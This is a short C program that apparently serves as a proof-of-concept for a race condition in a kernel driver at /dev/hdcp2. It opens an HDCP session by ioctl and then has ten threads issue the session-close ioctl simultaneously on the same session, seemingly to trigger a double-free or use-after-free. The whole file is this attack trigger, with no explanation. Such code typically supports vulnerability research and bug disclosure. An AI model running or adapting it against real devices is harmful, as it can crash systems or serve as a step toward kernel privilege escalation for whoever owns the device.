#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <stdbool.h>
#include <string.h>
#include <sys/ioctl.h>
#include <pthread.h>

#define HDCP_WRAP_MAX_SIZE             (128)

struct hdcp_sess_info {
	uint32_t ss_id;
	uint8_t wkey[HDCP_WRAP_MAX_SIZE];
};

#define HDCP_IOC_SESSION_OPEN		_IOWR('S', 1, struct hdcp_sess_info)
#define HDCP_IOC_SESSION_CLOSE		_IOWR('S', 2, struct hdcp_sess_info)

int fd;
struct hdcp_sess_info ss_info;

_Atomic int ready_count = 0;
_Atomic bool close_go = false;
#define NUM_THREADS 10

void *close_racer(void *arg) {
	ready_count++;
	while (!close_go) {}
	errno = 0;
	int ret = ioctl(fd, HDCP_IOC_SESSION_CLOSE, &ss_info);
	printf("ioctl = %d: %d: %s\n", ret, errno, strerror(errno));
	return NULL;
}


int main(int argc, const char *argv[]) {
	errno = 0;
	fd = open("/dev/hdcp2", O_RDWR);
	printf("open = %d: %d: %s\n", fd, errno, strerror(errno));
	errno = 0;
	int ret = ioctl(fd, HDCP_IOC_SESSION_OPEN, &ss_info);
	printf("ioctl = %d: %d: %s\n", ret, errno, strerror(errno));
	printf("ss_info.ss_id = %d\n", ss_info.ss_id);
	pthread_t threads[NUM_THREADS];
	for (int i = 0; i < NUM_THREADS; i++) {
		pthread_create(&threads[i], NULL, close_racer, NULL);
	}
	while (ready_count < NUM_THREADS) {}
	close_go = true;
	for (int i = 0; i < NUM_THREADS; i++) {
		pthread_join(threads[i], NULL);
	}
	printf("done\n");
	return 0;
}
